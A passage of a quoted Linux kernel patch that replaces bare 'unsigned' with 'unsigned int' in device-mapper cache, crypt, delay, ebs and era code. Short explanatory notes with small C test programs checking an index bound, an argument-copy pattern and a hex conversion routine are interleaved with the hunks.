+ 	return l_empty(&ea->free);
+ }
+ 
+-static unsigned get_index(struct entry_alloc *ea, struct entry *e)
++static unsigned int get_index(struct entry_alloc *ea, struct entry *e)
+ {
+ 	return to_index(ea->es, e) - ea->begin;
+ }
+ 
+-static struct entry *get_entry(struct entry_alloc *ea, unsigned index)
++static struct entry *get_entry(struct entry_alloc *ea, unsigned int index)
+ {
+ 	return __get_entry(ea->es, ea->begin + index);
+ }
+@@ -800,9 +801,9 @@ struct smq_policy {
+ 	sector_t cache_block_size;
+ 
+ 	sector_t hotspot_block_size;
+-	unsigned nr_hotspot_blocks;
+-	unsigned cache_blocks_per_hotspot_block;
+-	unsigned hotspot_level_jump;
++	unsigned int nr_hotspot_blocks;
++	unsigned int cache_blocks_per_hotspot_block;
++	unsigned int hotspot_level_jump;
+ 
+ 	struct entry_space es;
+ 	struct entry_alloc writeback_sentinel_alloc;
+@@ -831,7 +832,7 @@ struct smq_policy {
+ 	 * Keeps track of time, incremented by the core.  We use this to
+ 	 * avoid attributing multiple hits within the same tick.
+ 	 */
+-	unsigned tick;
++	unsigned int tick;
+ 
+ 	/*
+ 	 * The hash tables allow us to quickly find an entry by origin
+@@ -846,8 +847,8 @@ struct smq_policy {
+ 	bool current_demote_sentinels;
+ 	unsigned long next_demote_period;
+ 
+-	unsigned write_promote_level;
+-	unsigned read_promote_level;
++	unsigned int write_promote_level;
++	unsigned int read_promote_level;
+ 
+ 	unsigned long next_hotspot_period;
+ 	unsigned long next_cache_period;
+@@ -859,24 +860,24 @@ struct smq_policy {
+ 
+ /*----------------------------------------------------------------*/
+ 
+-static struct entry *get_sentinel(struct entry_alloc *ea, unsigned level, bool which)
++static struct entry *get_sentinel(struct entry_alloc *ea, unsigned int level, bool which)
+ {
+ 	return get_entry(ea, which ? level : NR_CACHE_LEVELS + level);
+ }
+ 
+-static struct entry *writeback_sentinel(struct smq_policy *mq, unsigned level)
++static struct entry *writeback_sentinel(struct smq_policy *mq, unsigned int level)
+ {
+ 	return get_sentinel(&mq->writeback_sentinel_alloc, level, mq->current_writeback_sentinels);
+ }
+ 
+-static struct entry *demote_sentinel(struct smq_policy *mq, unsigned level)
++static struct entry *demote_sentinel(struct smq_policy *mq, unsigned int level)
+ {
+ 	return get_sentinel(&mq->demote_sentinel_alloc, level, mq->current_demote_sentinels);
+ }
+ 
+ static void __update_writeback_sentinels(struct smq_policy *mq)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct queue *q = &mq->dirty;
+ 	struct entry *sentinel;
+ 
+@@ -889,7 +890,7 @@ static void __update_writeback_sentinels(struct smq_policy *mq)
+ 
+ static void __update_demote_sentinels(struct smq_policy *mq)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct queue *q = &mq->clean;
+ 	struct entry *sentinel;
+ 
+@@ -917,7 +918,7 @@ static void update_sentinels(struct smq_policy *mq)
+ 
+ static void __sentinels_init(struct smq_policy *mq)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct entry *sentinel;
+ 
+ 	for (level = 0; level < NR_CACHE_LEVELS; level++) {
+@@ -1008,7 +1009,7 @@ static void requeue(struct smq_policy *mq, struct entry *e)
+ 	}
+ }
+ 
+-static unsigned default_promote_level(struct smq_policy *mq)
++static unsigned int default_promote_level(struct smq_policy *mq)
+ {
+ 	/*
+ 	 * The promote level depends on the current performance of the
+@@ -1030,9 +1031,9 @@ static unsigned default_promote_level(struct smq_policy *mq)
+ 		1, 1, 1, 2, 4, 6, 7, 8, 7, 6, 4, 4, 3, 3, 2, 2, 1
+ 	};
+ 
+-	unsigned hits = mq->cache_stats.hits;
+-	unsigned misses = mq->cache_stats.misses;
+-	unsigned index = safe_div(hits << 4u, hits + misses);
++	unsigned int hits = mq->cache_stats.hits;
++	unsigned int misses = mq->cache_stats.misses;
++	unsigned int index = safe_div(hits << 4u, hits + misses);
+ 	return table[index];
+ }
+ 
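Note the bound in default_promote_level(): hits << 4 divided by hits + misses
never exceeds 16 (equality when misses is zero), so the 17-entry table above
is always indexed in range. A quick exhaustive check:

	#include <assert.h>

	int main(void)
	{
		unsigned int hits, misses;

		for (hits = 0; hits < 200; hits++)
			for (misses = 0; misses < 200; misses++) {
				unsigned int d = hits + misses;
				unsigned int index = d ? (hits << 4u) / d : 0u;

				assert(index <= 16);	/* 17-entry table */
			}
		return 0;
	}
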
+@@ -1042,7 +1043,7 @@ static void update_promote_levels(struct smq_policy *mq)
+ 	 * If there are unused cache entries then we want to be really
+ 	 * eager to promote.
+ 	 */
+-	unsigned threshold_level = allocator_empty(&mq->cache_alloc) ?
++	unsigned int threshold_level = allocator_empty(&mq->cache_alloc) ?
+ 		default_promote_level(mq) : (NR_HOTSPOT_LEVELS / 2u);
+ 
+ 	threshold_level = max(threshold_level, NR_HOTSPOT_LEVELS);
+@@ -1124,7 +1125,7 @@ static void end_cache_period(struct smq_policy *mq)
+ #define CLEAN_TARGET 25u
+ #define FREE_TARGET 25u
+ 
+-static unsigned percent_to_target(struct smq_policy *mq, unsigned p)
++static unsigned int percent_to_target(struct smq_policy *mq, unsigned int p)
+ {
+ 	return from_cblock(mq->cache_size) * p / 100u;
+ }
+@@ -1150,7 +1151,7 @@ static bool clean_target_met(struct smq_policy *mq, bool idle)
+ 
+ static bool free_target_met(struct smq_policy *mq)
+ {
+-	unsigned nr_free;
++	unsigned int nr_free;
+ 
+ 	nr_free = from_cblock(mq->cache_size) - mq->cache_alloc.nr_allocated;
+ 	return (nr_free + btracker_nr_demotions_queued(mq->bg_work)) >=
+@@ -1300,7 +1301,7 @@ static dm_oblock_t to_hblock(struct smq_policy *mq, dm_oblock_t b)
+ 
+ static struct entry *update_hotspot_queue(struct smq_policy *mq, dm_oblock_t b)
+ {
+-	unsigned hi;
++	unsigned int hi;
+ 	dm_oblock_t hb = to_hblock(mq, b);
+ 	struct entry *e = h_lookup(&mq->hotspot_table, hb);
+ 
+@@ -1549,7 +1550,7 @@ static void smq_clear_dirty(struct dm_cache_policy *p, dm_cblock_t cblock)
+ 	spin_unlock_irqrestore(&mq->lock, flags);
+ }
+ 
+-static unsigned random_level(dm_cblock_t cblock)
++static unsigned int random_level(dm_cblock_t cblock)
+ {
+ 	return hash_32(from_cblock(cblock), 9) & (NR_CACHE_LEVELS - 1);
+ }
+@@ -1660,7 +1661,7 @@ static int mq_set_config_value(struct dm_cache_policy *p,
+ }
+ 
+ static int mq_emit_config_values(struct dm_cache_policy *p, char *result,
+-				 unsigned maxlen, ssize_t *sz_ptr)
++				 unsigned int maxlen, ssize_t *sz_ptr)
+ {
+ 	ssize_t sz = *sz_ptr;
+ 
+@@ -1699,16 +1700,16 @@ static void init_policy_functions(struct smq_policy *mq, bool mimic_mq)
+ 
+ static bool too_many_hotspot_blocks(sector_t origin_size,
+ 				    sector_t hotspot_block_size,
+-				    unsigned nr_hotspot_blocks)
++				    unsigned int nr_hotspot_blocks)
+ {
+ 	return (hotspot_block_size * nr_hotspot_blocks) > origin_size;
+ }
+ 
+ static void calc_hotspot_params(sector_t origin_size,
+ 				sector_t cache_block_size,
+-				unsigned nr_cache_blocks,
++				unsigned int nr_cache_blocks,
+ 				sector_t *hotspot_block_size,
+-				unsigned *nr_hotspot_blocks)
++				unsigned int *nr_hotspot_blocks)
+ {
+ 	*hotspot_block_size = cache_block_size * 16u;
+ 	*nr_hotspot_blocks = max(nr_cache_blocks / 4u, 1024u);
+@@ -1724,9 +1725,9 @@ static struct dm_cache_policy *__smq_create(dm_cblock_t cache_size,
+ 					    bool mimic_mq,
+ 					    bool migrations_allowed)
+ {
+-	unsigned i;
+-	unsigned nr_sentinels_per_queue = 2u * NR_CACHE_LEVELS;
+-	unsigned total_sentinels = 2u * nr_sentinels_per_queue;
++	unsigned int i;
++	unsigned int nr_sentinels_per_queue = 2u * NR_CACHE_LEVELS;
++	unsigned int total_sentinels = 2u * nr_sentinels_per_queue;
+ 	struct smq_policy *mq = kzalloc(sizeof(*mq), GFP_KERNEL);
+ 
+ 	if (!mq)
+diff --git a/drivers/md/dm-cache-policy.c b/drivers/md/dm-cache-policy.c
+index c1a3cee99b445..2e58bbcf3e3bd 100644
+--- a/drivers/md/dm-cache-policy.c
++++ b/drivers/md/dm-cache-policy.c
+@@ -154,7 +154,7 @@ const char *dm_cache_policy_get_name(struct dm_cache_policy *p)
+ }
+ EXPORT_SYMBOL_GPL(dm_cache_policy_get_name);
+ 
+-const unsigned *dm_cache_policy_get_version(struct dm_cache_policy *p)
++const unsigned int *dm_cache_policy_get_version(struct dm_cache_policy *p)
+ {
+ 	struct dm_cache_policy_type *t = p->private;
+ 
+diff --git a/drivers/md/dm-cache-policy.h b/drivers/md/dm-cache-policy.h
+index 06eb31af626f1..6ba3e9c91af53 100644
+--- a/drivers/md/dm-cache-policy.h
++++ b/drivers/md/dm-cache-policy.h
+@@ -128,7 +128,7 @@ struct dm_cache_policy {
+ 	 * Configuration.
+ 	 */
+ 	int (*emit_config_values)(struct dm_cache_policy *p, char *result,
+-				  unsigned maxlen, ssize_t *sz_ptr);
++				  unsigned int maxlen, ssize_t *sz_ptr);
+ 	int (*set_config_value)(struct dm_cache_policy *p,
+ 				const char *key, const char *value);
+ 
+@@ -157,7 +157,7 @@ struct dm_cache_policy_type {
+ 	 * what gets passed on the target line to select your policy.
+ 	 */
+ 	char name[CACHE_POLICY_NAME_SIZE];
+-	unsigned version[CACHE_POLICY_VERSION_SIZE];
++	unsigned int version[CACHE_POLICY_VERSION_SIZE];
+ 
+ 	/*
+ 	 * For use by an alias dm_cache_policy_type to point to the
+diff --git a/drivers/md/dm-cache-target.c b/drivers/md/dm-cache-target.c
+index 17fde3e5a1f7b..8f7426b71e025 100644
+--- a/drivers/md/dm-cache-target.c
++++ b/drivers/md/dm-cache-target.c
+@@ -275,7 +275,7 @@ enum cache_io_mode {
+ struct cache_features {
+ 	enum cache_metadata_mode mode;
+ 	enum cache_io_mode io_mode;
+-	unsigned metadata_version;
++	unsigned int metadata_version;
+ 	bool discard_passdown:1;
+ };
+ 
+@@ -362,7 +362,7 @@ struct cache {
+ 	 * Rather than reconstructing the table line for the status we just
+ 	 * save it and regurgitate.
+ 	 */
+-	unsigned nr_ctr_args;
++	unsigned int nr_ctr_args;
+ 	const char **ctr_args;
+ 
+ 	struct dm_kcopyd_client *copier;
+@@ -378,7 +378,7 @@ struct cache {
+ 	unsigned long *dirty_bitset;
+ 	atomic_t nr_dirty;
+ 
+-	unsigned policy_nr_args;
++	unsigned int policy_nr_args;
+ 	struct dm_cache_policy *policy;
+ 
+ 	/*
+@@ -409,7 +409,7 @@ struct cache {
+ 
+ struct per_bio_data {
+ 	bool tick:1;
+-	unsigned req_nr:2;
++	unsigned int req_nr:2;
+ 	struct dm_bio_prison_cell_v2 *cell;
+ 	struct dm_hook_info hook_info;
+ 	sector_t len;
+@@ -517,7 +517,7 @@ static void build_key(dm_oblock_t begin, dm_oblock_t end, struct dm_cell_key_v2
+ #define WRITE_LOCK_LEVEL 0
+ #define READ_WRITE_LOCK_LEVEL 1
+ 
+-static unsigned lock_level(struct bio *bio)
++static unsigned int lock_level(struct bio *bio)
+ {
+ 	return bio_data_dir(bio) == WRITE ?
+ 		WRITE_LOCK_LEVEL :
+@@ -1884,7 +1884,7 @@ static void check_migrations(struct work_struct *ws)
+  */
+ static void destroy(struct cache *cache)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	mempool_exit(&cache->migration_pool);
+ 
+@@ -2124,7 +2124,7 @@ static int parse_features(struct cache_args *ca, struct dm_arg_set *as,
+ 	};
+ 
+ 	int r, mode_ctr = 0;
+-	unsigned argc;
++	unsigned int argc;
+ 	const char *arg;
+ 	struct cache_features *cf = &ca->features;
+ 
+@@ -2544,7 +2544,7 @@ bad:
+ 
+ static int copy_ctr_args(struct cache *cache, int argc, const char **argv)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	const char **copy;
+ 
+ 	copy = kcalloc(argc, sizeof(*copy), GFP_KERNEL);
+@@ -2566,7 +2566,7 @@ static int copy_ctr_args(struct cache *cache, int argc, const char **argv)
+ 	return 0;
+ }
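copy_ctr_args() above is the usual deep copy of an argv-style array with
unwinding on partial failure. A userspace analogue of the pattern (the
kernel version uses kcalloc()/kstrdup(); this sketch is illustrative only):

	#include <stdlib.h>
	#include <string.h>

	static char **copy_args(int argc, const char **argv)
	{
		int i;
		char **copy = calloc(argc, sizeof(*copy));

		if (!copy)
			return NULL;
		for (i = 0; i < argc; i++) {
			copy[i] = strdup(argv[i]);
			if (!copy[i]) {
				while (i--)	/* unwind on failure */
					free(copy[i]);
				free(copy);
				return NULL;
			}
		}
		return copy;
	}
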
+ 
+-static int cache_ctr(struct dm_target *ti, unsigned argc, char **argv)
++static int cache_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ {
+ 	int r = -EINVAL;
+ 	struct cache_args *ca;
+@@ -2669,7 +2669,7 @@ static int write_dirty_bitset(struct cache *cache)
+ 
+ static int write_discard_bitset(struct cache *cache)
+ {
+-	unsigned i, r;
++	unsigned int i, r;
+ 
+ 	if (get_cache_mode(cache) >= CM_READ_ONLY)
+ 		return -EINVAL;
+@@ -2983,11 +2983,11 @@ static void cache_resume(struct dm_target *ti)
+ }
+ 
+ static void emit_flags(struct cache *cache, char *result,
+-		       unsigned maxlen, ssize_t *sz_ptr)
++		       unsigned int maxlen, ssize_t *sz_ptr)
+ {
+ 	ssize_t sz = *sz_ptr;
+ 	struct cache_features *cf = &cache->features;
+-	unsigned count = (cf->metadata_version == 2) + !cf->discard_passdown + 1;
++	unsigned int count = (cf->metadata_version == 2) + !cf->discard_passdown + 1;
+ 
+ 	DMEMIT("%u ", count);
+ 
+@@ -3027,10 +3027,10 @@ static void emit_flags(struct cache *cache, char *result,
+  * <policy name> <#policy args> <policy args>* <cache metadata mode> <needs_check>
+  */
+ static void cache_status(struct dm_target *ti, status_type_t type,
+-			 unsigned status_flags, char *result, unsigned maxlen)
++			 unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 	ssize_t sz = 0;
+ 	dm_block_t nr_free_blocks_metadata = 0;
+ 	dm_block_t nr_blocks_metadata = 0;
+@@ -3067,18 +3067,18 @@ static void cache_status(struct dm_target *ti, status_type_t type,
+ 		residency = policy_residency(cache->policy);
+ 
+ 		DMEMIT("%u %llu/%llu %llu %llu/%llu %u %u %u %u %u %u %lu ",
+-		       (unsigned)DM_CACHE_METADATA_BLOCK_SIZE,
++		       (unsigned int)DM_CACHE_METADATA_BLOCK_SIZE,
+ 		       (unsigned long long)(nr_blocks_metadata - nr_free_blocks_metadata),
+ 		       (unsigned long long)nr_blocks_metadata,
+ 		       (unsigned long long)cache->sectors_per_block,
+ 		       (unsigned long long) from_cblock(residency),
+ 		       (unsigned long long) from_cblock(cache->cache_size),
+-		       (unsigned) atomic_read(&cache->stats.read_hit),
+-		       (unsigned) atomic_read(&cache->stats.read_miss),
+-		       (unsigned) atomic_read(&cache->stats.write_hit),
+-		       (unsigned) atomic_read(&cache->stats.write_miss),
+-		       (unsigned) atomic_read(&cache->stats.demotion),
+-		       (unsigned) atomic_read(&cache->stats.promotion),
++		       (unsigned int) atomic_read(&cache->stats.read_hit),
++		       (unsigned int) atomic_read(&cache->stats.read_miss),
++		       (unsigned int) atomic_read(&cache->stats.write_hit),
++		       (unsigned int) atomic_read(&cache->stats.write_miss),
++		       (unsigned int) atomic_read(&cache->stats.demotion),
++		       (unsigned int) atomic_read(&cache->stats.promotion),
+ 		       (unsigned long) atomic_read(&cache->nr_dirty));
+ 
+ 		emit_flags(cache, result, maxlen, &sz);
+@@ -3257,11 +3257,11 @@ static int request_invalidation(struct cache *cache, struct cblock_range *range)
+ 	return r;
+ }
+ 
+-static int process_invalidate_cblocks_message(struct cache *cache, unsigned count,
++static int process_invalidate_cblocks_message(struct cache *cache, unsigned int count,
+ 					      const char **cblock_ranges)
+ {
+ 	int r = 0;
+-	unsigned i;
++	unsigned int i;
+ 	struct cblock_range range;
+ 
+ 	if (!passthrough_mode(cache)) {
+@@ -3298,8 +3298,8 @@ static int process_invalidate_cblocks_message(struct cache *cache, unsigned coun
+  *
+  * The key migration_threshold is supported by the cache target core.
+  */
+-static int cache_message(struct dm_target *ti, unsigned argc, char **argv,
+-			 char *result, unsigned maxlen)
++static int cache_message(struct dm_target *ti, unsigned int argc, char **argv,
++			 char *result, unsigned int maxlen)
+ {
+ 	struct cache *cache = ti->private;
+ 
+diff --git a/drivers/md/dm-core.h b/drivers/md/dm-core.h
+index 6c6bd24774f25..28c641352de9b 100644
+--- a/drivers/md/dm-core.h
++++ b/drivers/md/dm-core.h
+@@ -119,7 +119,7 @@ struct mapped_device {
+ 	struct dm_stats stats;
+ 
+ 	/* the number of internal suspends */
+-	unsigned internal_suspend_count;
++	unsigned int internal_suspend_count;
+ 
+ 	int swap_bios;
+ 	struct semaphore swap_bios_semaphore;
+@@ -326,9 +326,9 @@ static inline struct completion *dm_get_completion_from_kobject(struct kobject *
+ 	return &container_of(kobj, struct dm_kobject_holder, kobj)->completion;
+ }
+ 
+-unsigned __dm_get_module_param(unsigned *module_param, unsigned def, unsigned max);
++unsigned int __dm_get_module_param(unsigned int *module_param, unsigned int def, unsigned int max);
+ 
+-static inline bool dm_message_test_buffer_overflow(char *result, unsigned maxlen)
++static inline bool dm_message_test_buffer_overflow(char *result, unsigned int maxlen)
+ {
+ 	return !maxlen || strlen(result) + 1 >= maxlen;
+ }
+diff --git a/drivers/md/dm-crypt.c b/drivers/md/dm-crypt.c
+index dc2d0d61ade93..ee269b1d09fac 100644
+--- a/drivers/md/dm-crypt.c
++++ b/drivers/md/dm-crypt.c
+@@ -173,14 +173,14 @@ struct crypt_config {
+ 	} iv_gen_private;
+ 	u64 iv_offset;
+ 	unsigned int iv_size;
+-	unsigned short int sector_size;
++	unsigned short sector_size;
+ 	unsigned char sector_shift;
+ 
+ 	union {
+ 		struct crypto_skcipher **tfms;
+ 		struct crypto_aead **tfms_aead;
+ 	} cipher_tfm;
+-	unsigned tfms_count;
++	unsigned int tfms_count;
+ 	unsigned long cipher_flags;
+ 
+ 	/*
+@@ -214,7 +214,7 @@ struct crypt_config {
+ 	 * pool for per bio private data, crypto requests,
+ 	 * encryption requests/buffer pages and integrity tags
+ 	 */
+-	unsigned tag_pool_max_sectors;
++	unsigned int tag_pool_max_sectors;
+ 	mempool_t tag_pool;
+ 	mempool_t req_pool;
+ 	mempool_t page_pool;
+@@ -231,7 +231,7 @@ struct crypt_config {
+ #define POOL_ENTRY_SIZE	512
+ 
+ static DEFINE_SPINLOCK(dm_crypt_clients_lock);
+-static unsigned dm_crypt_clients_n = 0;
++static unsigned int dm_crypt_clients_n = 0;
+ static volatile unsigned long dm_crypt_pages_per_client;
+ #define DM_CRYPT_MEMORY_PERCENT			2
+ #define DM_CRYPT_MIN_PAGES_PER_CLIENT		(BIO_MAX_VECS * 16)
+@@ -356,7 +356,7 @@ static int crypt_iv_essiv_gen(struct crypt_config *cc, u8 *iv,
+ static int crypt_iv_benbi_ctr(struct crypt_config *cc, struct dm_target *ti,
+ 			      const char *opts)
+ {
+-	unsigned bs;
++	unsigned int bs;
+ 	int log;
+ 
+ 	if (crypt_integrity_aead(cc))
+@@ -1466,7 +1466,7 @@ static void kcryptd_async_done(struct crypto_async_request *async_req,
+ static int crypt_alloc_req_skcipher(struct crypt_config *cc,
+ 				     struct convert_context *ctx)
+ {
+-	unsigned key_index = ctx->cc_sector & (cc->tfms_count - 1);
++	unsigned int key_index = ctx->cc_sector & (cc->tfms_count - 1);
+ 
+ 	if (!ctx->r.req) {
+ 		ctx->r.req = mempool_alloc(&cc->req_pool, in_interrupt() ? GFP_ATOMIC : GFP_NOIO);
+@@ -1660,13 +1660,13 @@ static void crypt_free_buffer_pages(struct crypt_config *cc, struct bio *clone);
+  * non-blocking allocations without a mutex first but on failure we fall back
+  * to blocking allocations with a mutex.
+  */
+-static struct bio *crypt_alloc_buffer(struct dm_crypt_io *io, unsigned size)
++static struct bio *crypt_alloc_buffer(struct dm_crypt_io *io, unsigned int size)
+ {
+ 	struct crypt_config *cc = io->cc;
+ 	struct bio *clone;
+ 	unsigned int nr_iovecs = (size + PAGE_SIZE - 1) >> PAGE_SHIFT;
+ 	gfp_t gfp_mask = GFP_NOWAIT | __GFP_HIGHMEM;
+-	unsigned i, len, remaining_size;
++	unsigned int i, len, remaining_size;
+ 	struct page *page;
+ 
+ retry:
+@@ -1806,7 +1806,7 @@ static void crypt_endio(struct bio *clone)
+ {
+ 	struct dm_crypt_io *io = clone->bi_private;
+ 	struct crypt_config *cc = io->cc;
+-	unsigned rw = bio_data_dir(clone);
++	unsigned int rw = bio_data_dir(clone);
+ 	blk_status_t error;
+ 
+ 	/*
+@@ -2261,7 +2261,7 @@ static void crypt_free_tfms_aead(struct crypt_config *cc)
+ 
+ static void crypt_free_tfms_skcipher(struct crypt_config *cc)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	if (!cc->cipher_tfm.tfms)
+ 		return;
+@@ -2286,7 +2286,7 @@ static void crypt_free_tfms(struct crypt_config *cc)
+ 
+ static int crypt_alloc_tfms_skcipher(struct crypt_config *cc, char *ciphermode)
+ {
+-	unsigned i;
++	unsigned int i;
+ 	int err;
+ 
+ 	cc->cipher_tfm.tfms = kcalloc(cc->tfms_count,
+@@ -2344,12 +2344,12 @@ static int crypt_alloc_tfms(struct crypt_config *cc, char *ciphermode)
+ 		return crypt_alloc_tfms_skcipher(cc, ciphermode);
+ }
+ 
+-static unsigned crypt_subkey_size(struct crypt_config *cc)
++static unsigned int crypt_subkey_size(struct crypt_config *cc)
+ {
+ 	return (cc->key_size - cc->key_extra_size) >> ilog2(cc->tfms_count);
+ }
+ 
+-static unsigned crypt_authenckey_size(struct crypt_config *cc)
++static unsigned int crypt_authenckey_size(struct crypt_config *cc)
+ {
+ 	return crypt_subkey_size(cc) + RTA_SPACE(sizeof(struct crypto_authenc_key_param));
+ }
+@@ -2360,7 +2360,7 @@ static unsigned crypt_authenckey_size(struct crypt_config *cc)
+  * This function converts cc->key to this special format.
+  */
+ static void crypt_copy_authenckey(char *p, const void *key,
+-				  unsigned enckeylen, unsigned authkeylen)
++				  unsigned int enckeylen, unsigned int authkeylen)
+ {
+ 	struct crypto_authenc_key_param *param;
+ 	struct rtattr *rta;
+@@ -2378,7 +2378,7 @@ static void crypt_copy_authenckey(char *p, const void *key,
+ 
+ static int crypt_setkey(struct crypt_config *cc)
+ {
+-	unsigned subkey_size;
++	unsigned int subkey_size;
+ 	int err = 0, i, r;
+ 
+ 	/* Ignore extra keys (which are used for IV etc) */
+@@ -3417,7 +3417,7 @@ static int crypt_map(struct dm_target *ti, struct bio *bio)
+ 	crypt_io_init(io, cc, bio, dm_target_offset(ti, bio->bi_iter.bi_sector));
+ 
+ 	if (cc->on_disk_tag_size) {
+-		unsigned tag_len = cc->on_disk_tag_size * (bio_sectors(bio) >> cc->sector_shift);
++		unsigned int tag_len = cc->on_disk_tag_size * (bio_sectors(bio) >> cc->sector_shift);
+ 
+ 		if (unlikely(tag_len > KMALLOC_MAX_SIZE) ||
+ 		    unlikely(!(io->integrity_metadata = kmalloc(tag_len,
+@@ -3445,14 +3445,14 @@ static int crypt_map(struct dm_target *ti, struct bio *bio)
+ 
+ static char hex2asc(unsigned char c)
+ {
+-	return c + '0' + ((unsigned)(9 - c) >> 4 & 0x27);
++	return c + '0' + ((unsigned int)(9 - c) >> 4 & 0x27);
+ }
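hex2asc() above is branchless: for c <= 9 the term (unsigned int)(9 - c) >> 4
is zero, so the result is '0' + c; for c >= 10 the subtraction wraps around,
the shift-and-mask leaves 0x27, and '0' + 0x27 + c equals 'a' + (c - 10). An
exhaustive check of all sixteen nibbles:

	#include <assert.h>

	static char hex2asc(unsigned char c)
	{
		return c + '0' + ((unsigned int)(9 - c) >> 4 & 0x27);
	}

	int main(void)
	{
		static const char ref[] = "0123456789abcdef";
		unsigned char c;

		for (c = 0; c < 16; c++)
			assert(hex2asc(c) == ref[c]);
		return 0;
	}
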
+ 
+ static void crypt_status(struct dm_target *ti, status_type_t type,
+-			 unsigned status_flags, char *result, unsigned maxlen)
++			 unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct crypt_config *cc = ti->private;
+-	unsigned i, sz = 0;
++	unsigned int i, sz = 0;
+ 	int num_feature_args = 0;
+ 
+ 	switch (type) {
+@@ -3568,8 +3568,8 @@ static void crypt_resume(struct dm_target *ti)
+  *	key set <key>
+  *	key wipe
+  */
+-static int crypt_message(struct dm_target *ti, unsigned argc, char **argv,
+-			 char *result, unsigned maxlen)
++static int crypt_message(struct dm_target *ti, unsigned int argc, char **argv,
++			 char *result, unsigned int maxlen)
+ {
+ 	struct crypt_config *cc = ti->private;
+ 	int key_size, ret = -EINVAL;
+@@ -3630,10 +3630,10 @@ static void crypt_io_hints(struct dm_target *ti, struct queue_limits *limits)
+ 	limits->max_segment_size = PAGE_SIZE;
+ 
+ 	limits->logical_block_size =
+-		max_t(unsigned, limits->logical_block_size, cc->sector_size);
++		max_t(unsigned int, limits->logical_block_size, cc->sector_size);
+ 	limits->physical_block_size =
+-		max_t(unsigned, limits->physical_block_size, cc->sector_size);
+-	limits->io_min = max_t(unsigned, limits->io_min, cc->sector_size);
++		max_t(unsigned int, limits->physical_block_size, cc->sector_size);
++	limits->io_min = max_t(unsigned int, limits->io_min, cc->sector_size);
+ 	limits->dma_alignment = limits->logical_block_size - 1;
+ }
+ 
+diff --git a/drivers/md/dm-delay.c b/drivers/md/dm-delay.c
+index 869afef5654ae..02b8f4e818276 100644
+--- a/drivers/md/dm-delay.c
++++ b/drivers/md/dm-delay.c
+@@ -20,8 +20,8 @@
+ struct delay_class {
+ 	struct dm_dev *dev;
+ 	sector_t start;
+-	unsigned delay;
+-	unsigned ops;
++	unsigned int delay;
++	unsigned int ops;
+ };
+ 
+ struct delay_c {
+@@ -305,7 +305,7 @@ static int delay_map(struct dm_target *ti, struct bio *bio)
+ 	DMEMIT("%s %llu %u", (c)->dev->name, (unsigned long long)(c)->start, (c)->delay)
+ 
+ static void delay_status(struct dm_target *ti, status_type_t type,
+-			 unsigned status_flags, char *result, unsigned maxlen)
++			 unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct delay_c *dc = ti->private;
+ 	int sz = 0;
+diff --git a/drivers/md/dm-ebs-target.c b/drivers/md/dm-ebs-target.c
+index 512cc6cea095a..7606c6695a0e2 100644
+--- a/drivers/md/dm-ebs-target.c
++++ b/drivers/md/dm-ebs-target.c
+@@ -390,7 +390,7 @@ static int ebs_map(struct dm_target *ti, struct bio *bio)
+ }
+ 
+ static void ebs_status(struct dm_target *ti, status_type_t type,
+-		       unsigned status_flags, char *result, unsigned maxlen)
++		       unsigned int status_flags, char *result, unsigned int maxlen)
+ {
+ 	struct ebs_c *ec = ti->private;
+ 
+diff --git a/drivers/md/dm-era-target.c b/drivers/md/dm-era-target.c
+index e92c1afc3677f..a96290103cca8 100644
+--- a/drivers/md/dm-era-target.c
++++ b/drivers/md/dm-era-target.c
+@@ -51,7 +51,7 @@ static void writeset_free(struct writeset *ws)
+ }
+ 
+ static int setup_on_disk_bitset(struct dm_disk_bitset *info,
+-				unsigned nr_bits, dm_block_t *root)
++				unsigned int nr_bits, dm_block_t *root)
+ {
+ 	int r;
+ 
+@@ -62,7 +62,7 @@ static int setup_on_disk_bitset(struct dm_disk_bitset *info,
+ 	return dm_bitset_resize(info, *root, 0, nr_bits, false, root);
+ }
+ 
+-static size_t bitset_size(unsigned nr_bits)
++static size_t bitset_size(unsigned int nr_bits)
+ {
+ 	return sizeof(unsigned long) * dm_div_up(nr_bits, BITS_PER_LONG);
+ }
+@@ -323,10 +323,10 @@ static int superblock_lock(struct era_metadata *md,
+ static int superblock_all_zeroes(struct dm_block_manager *bm, bool *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block *b;
+ 	__le64 *data_le, zero = cpu_to_le64(0);
+-	unsigned sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
++	unsigned int sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
+ 
+ 	/*
+ 	 * We can't use a validator here - it may be all zeroes.
+@@ -363,12 +363,12 @@ static void ws_unpack(const struct writeset_disk *disk, struct writeset_metadata
+ 	core->root = le64_to_cpu(disk->root);
+ }
+ 
+-static void ws_inc(void *context, const void *value, unsigned count)
++static void ws_inc(void *context, const void *value, unsigned int count)
+ {
+ 	struct era_metadata *md = context;
+ 	struct writeset_disk ws_d;
+ 	dm_block_t b;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		memcpy(&ws_d, value + (i * sizeof(ws_d)), sizeof(ws_d));
+@@ -377,12 +377,12 @@ static void ws_inc(void *context, const void *value, unsigned count)
+ 	}
+ }
+ 
+-static void ws_dec(void *context, const void *value, unsigned count)
++static void ws_dec(void *context, const void *value, unsigned int count)
+ {
+ 	struct era_metadata *md = context;
+ 	struct writeset_disk ws_d;
+ 	dm_block_t b;
+-	unsigned i;
++	unsigned int i;
+ 
+ 	for (i = 0; i < count; i++) {
+ 		memcpy(&ws_d, value + (i * sizeof(ws_d)), sizeof(ws_d));
+@@ -667,7 +667,7 @@ static void swap_writeset(struct era_metadata *md, struct writeset *new_writeset
+  *--------------------------------------------------------------*/
+ struct digest {
+ 	uint32_t era;
+-	unsigned nr_bits, current_bit;
++	unsigned int nr_bits, current_bit;
+ 	struct writeset_metadata writeset;
+ 	__le32 value;
+ 	struct dm_disk_bitset info;
+@@ -702,7 +702,7 @@ static int metadata_digest_transcribe_writeset(struct era_metadata *md,
+ {
